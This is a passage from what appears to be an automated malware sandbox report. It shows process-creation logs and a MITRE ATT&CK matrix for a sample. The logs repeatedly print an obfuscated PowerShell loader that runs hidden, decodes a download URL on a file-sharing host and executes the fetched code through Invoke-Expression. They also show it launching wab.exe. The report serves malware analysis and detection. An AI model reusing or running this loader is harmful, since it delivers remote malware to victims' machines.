FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$AmeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sanguinarily='sub';$sanguinarily+='strin';$colour = 1;$sanguinarily+='g';function circuted($kropsvisiteret26){$blazer=$kropsvisiteret26.length-$colour;for($tvrfljte=5;$tvrfljte -lt $blazer;$tvrfljte+=6){$intraperitoneally+=$kropsvisiteret26.$sanguinarily.invoke( $tvrfljte, $colour);}$intraperitoneally;}function udkrte($udmatningens){ . ($polarizer) ($udmatningens);}$ontological=circuted 'alenlmgynobo animzcopiei dekll unbrlkaramad,esk/ abso5 edrr.c.apt0clemp notc(dru,nwunifoinailenpr.madco.seounbuiwsheepsfrste metalnundertl ndq prede1scrip0postt.penty0 dra.;gidsl spnd,wp ddii.rembnba ng6 ,ram4b roc;rkebi raasxtermt6 d.ej4 kn.r;ringt lassordiscjvca.bi:archt1bicen2aftgt1o,tol. sile0sulfo)diver prof.g,fglaepen,acfalk,k fi,honethi/admir2encin0griff1 tram0cytis0m,tro1lufti0kben 1mech, forblfdr.gaigkantrd,mmee forrf gelsoslag,x sia./lande1 un i2denot1baand. e eb0 sost ';$pullouts=circuted ' eva,u,epouslu tlenondermange- mellacamorgbkarveto.fun unpotzeppe ';$skraaremmens=circuted 'gim ehlusketsidettsamlepcalcas bo.i: circ/lseti/truthwbackfwregiswubesl. karisdec neineq nco kadberylsriotep lichaadaptcjenh,eglott.bademca osto .aktmd.ght/hydropdecimrh,spiodamas/homeod.aretlxerot/ desiivi li4gjord1 freealupan7 alvf6 loes ';$spisestel=circuted 'bolte>cubin ';$polarizer=circuted 's irriflykkera,idxkonst ';$spiegeleisen='decephalize';$thermoremanent12 = circuted ' hecte frejc,vigehprem,oudtry udska%klemea folkpnogggpagnindgvenda.odsetregloaarchi%krimi\uv.askunivelnonada mishv palbetal,yromop sgassl.b,dstuapostedyppen eino .verl& sprj&te,no scane kongc modehpollaojejun varu twindi ';udkrte (circuted 'nonsy$indisgferiel,anneougeraboutlaaanti l,rist:willynmytolo,rocenun ersstilitbraktuunsh d fascysurli=kdest(beforcprotom overdvolde flers/unde.cdisin whabb$ g,amthjemmh aralescarvrse uemusnobokardirroeddeperi,mhenhrai,difnlurefegerman .omet ,lle1over 2sub.e) ,und ');udkrte (circuted 'averr$luf,egfaerdltaphvobru.sbarchpa flytl diss:turneptautoaresigrgorinasel.kpnonaronrmeldrev,l=co.on$akkusssuperk c enractedaoplseaaf,kir ilmedi tam gattm t.leelrlinnsk,bsspopul. fyris u depsnedkl.alkiiautontsofav( baro$enklashygroppiqueiheav,smeteoeopbudshals tbie.dekamm.ldydsk).orsv ');$skraaremmens=$parapod[0];$kriminalromans= (circuted 'orgel$zonopgun,erludstoobrdskbbostra v,sslunbal:positaaabnin.airbdvect,eumedgfpagi.ap ohidvandleflagsrargene cactnrhota=cykelneppieedalr wnitzh-udrado sletbpaaklj,oaccerabarcslumptsmurr diplasuncolypil.rscattatb.sageejendmf rda. svignsprngebeslutzapti. co,dwhusbaegan,tbhypocctopolloestrithumbe bi on skldt');$kriminalromans+=$nonstudy[1];udkrte ($kriminalromans);udkrte (circuted 'fiksp$u,deraomstinhampsdhyposei iqufolo,ea rectd,rintestudirundsae.zarinalphi. utilhsaccaehesseadiaspd sbirefilmar pttsssemec[tknin$ virkp,pdraubestilembralexpeloskraluopsamtgamblscorru] mill=gente$comoro midtnufordtspecio ef el c lio fodgg.valmi uns.cistanakaravlslag. ');$ame
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$sanguinarily='sub';$sanguinarily+='strin';$colour = 1;$sanguinarily+='g';function circuted($kropsvisiteret26){$blazer=$kropsvisiteret26.length-$colour;for($tvrfljte=5;$tvrfljte -lt $blazer;$tvrfljte+=6){$intraperitoneally+=$kropsvisiteret26.$sanguinarily.invoke( $tvrfljte, $colour);}$intraperitoneally;}function udkrte($udmatningens){ . ($polarizer) ($udmatningens);}$ontological=circuted 'alenlmgynobo animzcopiei dekll unbrlkaramad,esk/ abso5 edrr.c.apt0clemp notc(dru,nwunifoinailenpr.madco.seounbuiwsheepsfrste metalnundertl ndq prede1scrip0postt.penty0 dra.;gidsl spnd,wp ddii.rembnba ng6 ,ram4b roc;rkebi raasxtermt6 d.ej4 kn.r;ringt lassordiscjvca.bi:archt1bicen2aftgt1o,tol. sile0sulfo)diver prof.g,fglaepen,acfalk,k fi,honethi/admir2encin0griff1 tram0cytis0m,tro1lufti0kben 1mech, forblfdr.gaigkantrd,mmee forrf gelsoslag,x sia./lande1 un i2denot1baand. e eb0 sost ';$pullouts=circuted ' eva,u,epouslu tlenondermange- mellacamorgbkarveto.fun unpotzeppe ';$skraaremmens=circuted 'gim ehlusketsidettsamlepcalcas bo.i: circ/lseti/truthwbackfwregiswubesl. karisdec neineq nco kadberylsriotep lichaadaptcjenh,eglott.bademca osto .aktmd.ght/hydropdecimrh,spiodamas/homeod.aretlxerot/ desiivi li4gjord1 freealupan7 alvf6 loes ';$spisestel=circuted 'bolte>cubin ';$polarizer=circuted 's irriflykkera,idxkonst ';$spiegeleisen='decephalize';$thermoremanent12 = circuted ' hecte frejc,vigehprem,oudtry udska%klemea folkpnogggpagnindgvenda.odsetregloaarchi%krimi\uv.askunivelnonada mishv palbetal,yromop sgassl.b,dstuapostedyppen eino .verl& sprj&te,no scane kongc modehpollaojejun varu twindi ';udkrte (circuted 'nonsy$indisgferiel,anneougeraboutlaaanti l,rist:willynmytolo,rocenun ersstilitbraktuunsh d fascysurli=kdest(beforcprotom overdvolde flers/unde.cdisin whabb$ g,amthjemmh aralescarvrse uemusnobokardirroeddeperi,mhenhrai,difnlurefegerman .omet ,lle1over 2sub.e) ,und ');udkrte (circuted 'averr$luf,egfaerdltaphvobru.sbarchpa flytl diss:turneptautoaresigrgorinasel.kpnonaronrmeldrev,l=co.on$akkusssuperk c enractedaoplseaaf,kir ilmedi tam gattm t.leelrlinnsk,bsspopul. fyris u depsnedkl.alkiiautontsofav( baro$enklashygroppiqueiheav,smeteoeopbudshals tbie.dekamm.ldydsk).orsv ');$skraaremmens=$parapod[0];$kriminalromans= (circuted 'orgel$zonopgun,erludstoobrdskbbostra v,sslunbal:positaaabnin.airbdvect,eumedgfpagi.ap ohidvandleflagsrargene cactnrhota=cykelneppieedalr wnitzh-udrado sletbpaaklj,oaccerabarcslumptsmurr diplasuncolypil.rscattatb.sageejendmf rda. svignsprngebeslutzapti. co,dwhusbaegan,tbhypocctopolloestrithumbe bi on skldt');$kriminalromans+=$nonstudy[1];udkrte ($kriminalromans);udkrte (circuted 'fiksp$u,deraomstinhampsdhyposei iqufolo,ea rectd,rintestudirundsae.zarinalphi. utilhsaccaehesseadiaspd sbirefilmar pttsssemec[tknin$ virkp,pdraubestilembralexpeloskraluopsamtgamblscorru] mill=gente$comoro midtnufordtspecio ef el c lio fodgg.valmi uns.ci
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sanguinarily='sub';$sanguinarily+='strin';$colour = 1;$sanguinarily+='g';function circuted($kropsvisiteret26){$blazer=$kropsvisiteret26.length-$colour;for($tvrfljte=5;$tvrfljte -lt $blazer;$tvrfljte+=6){$intraperitoneally+=$kropsvisiteret26.$sanguinarily.invoke( $tvrfljte, $colour);}$intraperitoneally;}function udkrte($udmatningens){ . ($polarizer) ($udmatningens);}$ontological=circuted 'alenlmgynobo animzcopiei dekll unbrlkaramad,esk/ abso5 edrr.c.apt0clemp notc(dru,nwunifoinailenpr.madco.seounbuiwsheepsfrste metalnundertl ndq prede1scrip0postt.penty0 dra.;gidsl spnd,wp ddii.rembnba ng6 ,ram4b roc;rkebi raasxtermt6 d.ej4 kn.r;ringt lassordiscjvca.bi:archt1bicen2aftgt1o,tol. sile0sulfo)diver prof.g,fglaepen,acfalk,k fi,honethi/admir2encin0griff1 tram0cytis0m,tro1lufti0kben 1mech, forblfdr.gaigkantrd,mmee forrf gelsoslag,x sia./lande1 un i2denot1baand. e eb0 sost ';$pullouts=circuted ' eva,u,epouslu tlenondermange- mellacamorgbkarveto.fun unpotzeppe ';$skraaremmens=circuted 'gim ehlusketsidettsamlepcalcas bo.i: circ/lseti/truthwbackfwregiswubesl. karisdec neineq nco kadberylsriotep lichaadaptcjenh,eglott.bademca osto .aktmd.ght/hydropdecimrh,spiodamas/homeod.aretlxerot/ desiivi li4gjord1 freealupan7 alvf6 loes ';$spisestel=circuted 'bolte>cubin ';$polarizer=circuted 's irriflykkera,idxkonst ';$spiegeleisen='decephalize';$thermoremanent12 = circuted ' hecte frejc,vigehprem,oudtry udska%klemea folkpnogggpagnindgvenda.odsetregloaarchi%krimi\uv.askunivelnonada mishv palbetal,yromop sgassl.b,dstuapostedyppen eino .verl& sprj&te,no scane kongc modehpollaojejun varu twindi ';udkrte (circuted 'nonsy$indisgferiel,anneougeraboutlaaanti l,rist:willynmytolo,rocenun ersstilitbraktuunsh d fascysurli=kdest(beforcprotom overdvolde flers/unde.cdisin whabb$ g,amthjemmh aralescarvrse uemusnobokardirroeddeperi,mhenhrai,difnlurefegerman .omet ,lle1over 2sub.e) ,und ');udkrte (circuted 'averr$luf,egfaerdltaphvobru.sbarchpa flytl diss:turneptautoaresigrgorinasel.kpnonaronrmeldrev,l=co.on$akkusssuperk c enractedaoplseaaf,kir ilmedi tam gattm t.leelrlinnsk,bsspopul. fyris u depsnedkl.alkiiautontsofav( baro$enklashygroppiqueiheav,smeteoeopbudshals tbie.dekamm.ldydsk).orsv ');$skraaremmens=$parapod[0];$kriminalromans= (circuted 'orgel$zonopgun,erludstoobrdskbbostra v,sslunbal:positaaabnin.airbdvect,eumedgfpagi.ap ohidvandleflagsrargene cactnrhota=cykelneppieedalr wnitzh-udrado sletbpaaklj,oaccerabarcslumptsmurr diplasuncolypil.rscattatb.sageejendmf rda. svignsprngebeslutzapti. co,dwhusbaegan,tbhypocctopolloestrithumbe bi on skldt');$kriminalromans+=$nonstudy[1];udkrte ($kriminalromans);udkrte (circuted 'fiksp$u,deraomstinhampsdhyposei iqufolo,ea rectd,rintestudirundsae.zarinalphi. utilhsaccaehesseadiaspd sbirefilmar pttsssemec[tknin$ virkp,pdraubestilembralexpeloskraluopsamtgamblscorru] mill=gente$comoro midtnufordtspecio ef el c lio fodgg.valmi uns.cistanakaravlslag. ');$ameJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$sanguinarily='sub';$sanguinarily+='strin';$colour = 1;$sanguinarily+='g';function circuted($kropsvisiteret26){$blazer=$kropsvisiteret26.length-$colour;for($tvrfljte=5;$tvrfljte -lt $blazer;$tvrfljte+=6){$intraperitoneally+=$kropsvisiteret26.$sanguinarily.invoke( $tvrfljte, $colour);}$intraperitoneally;}function udkrte($udmatningens){ . ($polarizer) ($udmatningens);}$ontological=circuted 'alenlmgynobo animzcopiei dekll unbrlkaramad,esk/ abso5 edrr.c.apt0clemp notc(dru,nwunifoinailenpr.madco.seounbuiwsheepsfrste metalnundertl ndq prede1scrip0postt.penty0 dra.;gidsl spnd,wp ddii.rembnba ng6 ,ram4b roc;rkebi raasxtermt6 d.ej4 kn.r;ringt lassordiscjvca.bi:archt1bicen2aftgt1o,tol. sile0sulfo)diver prof.g,fglaepen,acfalk,k fi,honethi/admir2encin0griff1 tram0cytis0m,tro1lufti0kben 1mech, forblfdr.gaigkantrd,mmee forrf gelsoslag,x sia./lande1 un i2denot1baand. e eb0 sost ';$pullouts=circuted ' eva,u,epouslu tlenondermange- mellacamorgbkarveto.fun unpotzeppe ';$skraaremmens=circuted 'gim ehlusketsidettsamlepcalcas bo.i: circ/lseti/truthwbackfwregiswubesl. karisdec neineq nco kadberylsriotep lichaadaptcjenh,eglott.bademca osto .aktmd.ght/hydropdecimrh,spiodamas/homeod.aretlxerot/ desiivi li4gjord1 freealupan7 alvf6 loes ';$spisestel=circuted 'bolte>cubin ';$polarizer=circuted 's irriflykkera,idxkonst ';$spiegeleisen='decephalize';$thermoremanent12 = circuted ' hecte frejc,vigehprem,oudtry udska%klemea folkpnogggpagnindgvenda.odsetregloaarchi%krimi\uv.askunivelnonada mishv palbetal,yromop sgassl.b,dstuapostedyppen eino .verl& sprj&te,no scane kongc modehpollaojejun varu twindi ';udkrte (circuted 'nonsy$indisgferiel,anneougeraboutlaaanti l,rist:willynmytolo,rocenun ersstilitbraktuunsh d fascysurli=kdest(beforcprotom overdvolde flers/unde.cdisin whabb$ g,amthjemmh aralescarvrse uemusnobokardirroeddeperi,mhenhrai,difnlurefegerman .omet ,lle1over 2sub.e) ,und ');udkrte (circuted 'averr$luf,egfaerdltaphvobru.sbarchpa flytl diss:turneptautoaresigrgorinasel.kpnonaronrmeldrev,l=co.on$akkusssuperk c enractedaoplseaaf,kir ilmedi tam gattm t.leelrlinnsk,bsspopul. fyris u depsnedkl.alkiiautontsofav( baro$enklashygroppiqueiheav,smeteoeopbudshals tbie.dekamm.ldydsk).orsv ');$skraaremmens=$parapod[0];$kriminalromans= (circuted 'orgel$zonopgun,erludstoobrdskbbostra v,sslunbal:positaaabnin.airbdvect,eumedgfpagi.ap ohidvandleflagsrargene cactnrhota=cykelneppieedalr wnitzh-udrado sletbpaaklj,oaccerabarcslumptsmurr diplasuncolypil.rscattatb.sageejendmf rda. svignsprngebeslutzapti. co,dwhusbaegan,tbhypocctopolloestrithumbe bi on skldt');$kriminalromans+=$nonstudy[1];udkrte ($kriminalromans);udkrte (circuted 'fiksp$u,deraomstinhampsdhyposei iqufolo,ea rectd,rintestudirundsae.zarinalphi. utilhsaccaehesseadiaspd sbirefilmar pttsssemec[tknin$ virkp,pdraubestilembralexpeloskraluopsamtgamblscorru] mill=gente$comoro midtnufordtspecio ef el c lio fodgg.valmi uns.ciJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              Registry Run Keys / Startup Folder              		111
              Process Injection              		221
              Masquerading              		11
              Input Capture              		111
              Security Software Discovery              		1
              Taint Shared Content              		11
              Input Capture              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              Registry Run Keys / Startup Folder              		1
              Disable or Modify Tools              		LSASS Memory1
              Process Discovery              		Remote Desktop Protocol1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		Logon Script (Windows)1
              DLL Side-Loading              		31
              Virtualization/Sandbox Evasion              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture13
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information              		LSA Secrets2
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              Software Packing              		Cached Domain Credentials12
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
